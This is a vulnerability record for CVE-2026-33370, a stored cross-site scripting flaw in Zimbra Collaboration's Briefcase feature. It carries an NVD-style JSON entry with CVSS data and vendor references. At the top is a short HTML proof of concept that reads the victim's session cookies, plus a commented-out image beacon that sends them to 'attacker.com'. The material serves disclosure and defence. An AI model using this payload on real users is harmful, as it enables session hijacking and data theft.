CVE-2026-33370

<!-- Proof of Concept for CVE-2026-33370 --> <!-- This payload demonstrates the execution of JS in the victim's browser --> <html> <body> <h3>Document Preview</h3> <script> // Simulate exfiltration of session cookies var stolenData = document.cookie; console.log("[+] Exfiltrating cookies: " + stolenData); // In a real attack, this would send data to an attacker-controlled server // var img = new Image(); // img.src = "http://attacker.com/steal?c=" + encodeURIComponent(stolenData); </script> </body> </html>

{"cve": {"id": "CVE-2026-33370", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:16.127", "lastModified": "2026-04-01T15:36:22.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Zimbra Briefcase feature due to insufficient sanitization of specific uploaded file types. When a user opens a publicly shared Briefcase file containing malicious scripts, the embedded JavaScript executes in the context of the user's session. This allows an attacker to run arbitrary scripts, potentially leading to data exfiltration or other unauthorized actions on behalf of the victim user."}, {"lang": "es", "value": "Se descubrió un problema en Zimbra Collaboration (ZCS) 10.0 y 10.1. Existe una vulnerabilidad de cross-site scripting (XSS) almacenado en la función Zimbra Briefcase debido a una sanitización insuficiente de tipos de archivos subidos específicos. Cuando un usuario abre un archivo de Briefcase compartido públicamente que contiene scripts maliciosos, el JavaScript incrustado se ejecuta en el contexto de la sesión del usuario. Esto permite a un atacante ejecutar scripts arbitrarios, lo que podría llevar a la exfiltración de datos o a otras acciones no autorizadas en nombre del usuario víctima."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}